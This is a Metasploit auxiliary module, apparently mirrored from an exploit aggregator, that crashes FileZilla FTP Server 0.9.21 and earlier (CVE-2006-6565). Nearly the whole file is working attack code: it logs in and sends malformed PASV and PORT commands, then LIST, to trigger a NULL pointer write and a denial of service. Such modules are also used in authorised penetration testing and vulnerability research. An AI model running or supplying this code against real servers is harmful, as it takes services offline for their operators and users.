## https://sploitus.com/exploit?id=PACKETSTORM:180575
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'FileZilla FTP Server Malformed PORT Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the FileZilla FTP
Server versions 0.9.21 and earlier. By sending a malformed PORT command
then LIST command, the server attempts to write to a NULL pointer.
},
'Author' => [ 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '21542' ],
[ 'BID', '21549' ],
[ 'CVE', '2006-6565' ],
[ 'EDB', '2914' ],
[ 'OSVDB', '34435' ]
],
'DisclosureDate' => '2006-12-11'))
end
def run
begin
c = connect_login
rescue Rex::ConnectionRefused
print_error("Connection refused.")
return
rescue Rex::ConnectionTimeout
print_error("Connection timed out")
return
end
return if not c
send_cmd(['PASV', 'A*'], true) # Assigns PASV port
send_cmd(['PORT', 'A*'], true) # Rejected but seems to assign NULL to pointer
send_cmd(['LIST'], true) # Try and push data to NULL port, trigger crash :)
disconnect
end
end